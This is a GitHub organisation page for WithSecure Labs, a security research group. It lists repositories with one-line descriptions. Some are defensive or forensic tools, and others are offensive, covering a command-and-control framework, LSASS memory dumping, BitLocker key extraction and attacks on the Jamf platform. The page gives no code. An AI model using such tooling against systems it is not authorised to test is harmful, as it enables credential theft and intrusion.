WithSecure Labs
Welcome to WithSecure Labs. Here we publish research, and share our tools with the security community.
Pinned Repositories
awspx
A graph-based tool for visualizing effective access and resource relationships in AWS environments.
C3
Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.
CallStackSpoofer
A PoC implementation for spoofing arbitrary call stacks when making sys calls (e.g. grabbing a handle via NtOpenProcess)
chainsaw
Rapidly Search and Hunt through Windows Forensic Artefacts
doublepulsar-detection-script
A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.
drozer
The Leading Security Assessment Framework for Android.
leonidas
Automated Attack Simulation in the Cloud, complete with detection use cases.
needle
The iOS Security Testing Framework
physmem2profit
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
python-exe-unpacker
A helper script for unpacking and decompiling EXEs compiled from python code.
WithSecure Labs's Repositories
WithSecureLabs/needle
The iOS Security Testing Framework
WithSecureLabs/doublepulsar-detection-script
A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.
WithSecureLabs/awspx
A graph-based tool for visualizing effective access and resource relationships in AWS environments.
WithSecureLabs/python-exe-unpacker
A helper script for unpacking and decompiling EXEs compiled from python code.
WithSecureLabs/CallStackSpoofer
A PoC implementation for spoofing arbitrary call stacks when making sys calls (e.g. grabbing a handle via NtOpenProcess)
WithSecureLabs/physmem2profit
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
WithSecureLabs/captcha22
CAPTCHA22 is a toolset for building, and training, CAPTCHA cracking models using neural networks.
WithSecureLabs/Jandroid
WithSecureLabs/bitlocker-spi-toolkit
Tools for decoding TPM SPI transaction and extracting the BitLocker key from them.
WithSecureLabs/Jamf-Attack-Toolkit
Suite of tools to facilitate attacks against the Jamf macOS management platform.
WithSecureLabs/peas
PEAS is a Python 2 library and command line application for running commands on an ActiveSync server e.g. Microsoft Exchange.
WithSecureLabs/ppid-spoofing
Scripts for performing and detecting parent PID spoofing
WithSecureLabs/detectree
Data visualization for blue teams
WithSecureLabs/TickTock
WithSecureLabs/AMSIDetection
AMSI detection PoC
WithSecureLabs/ESFang
ESF modular ingestion tool for development and research.
WithSecureLabs/macOSTriageCollectionScript
A triage data collection script for macOS
WithSecureLabs/lazarus-sigma-rules
WithSecureLabs/RemotePSpy
RemotePSpy provides live monitoring of remote PowerShell sessions, which is particularly useful for older (pre-5.0) versions of PowerShell which do not have comprehensive logging facilities built in.
WithSecureLabs/FLAIR
F-Secure Lightweight Acqusition for Incident Response (FLAIR)
WithSecureLabs/mongo-rs
A higher-level wrapper on top of the official bson & mongodb crates.
WithSecureLabs/keywe-tooling
Tools that can be used to interact with the KeyWe Smart Lock device.
WithSecureLabs/usb-ninja-detection-poc
USB Ninja Detection PoC
WithSecureLabs/dreamer
Easier cloud infrastructure with Terraform and Ansible
WithSecureLabs/boops-boops-android-agent
WithSecureLabs/snake-tail
snake-tail - the command line ui for snake
WithSecureLabs/boops-boops-docker-container
WithSecureLabs/Cue-COVID-Test_Research-Files
WithSecureLabs/prototype-pollution
WithSecureLabs/soccrates_adapters
Helpers for adapting data from Elements Vulnerability Management to be used in Soccrates EU project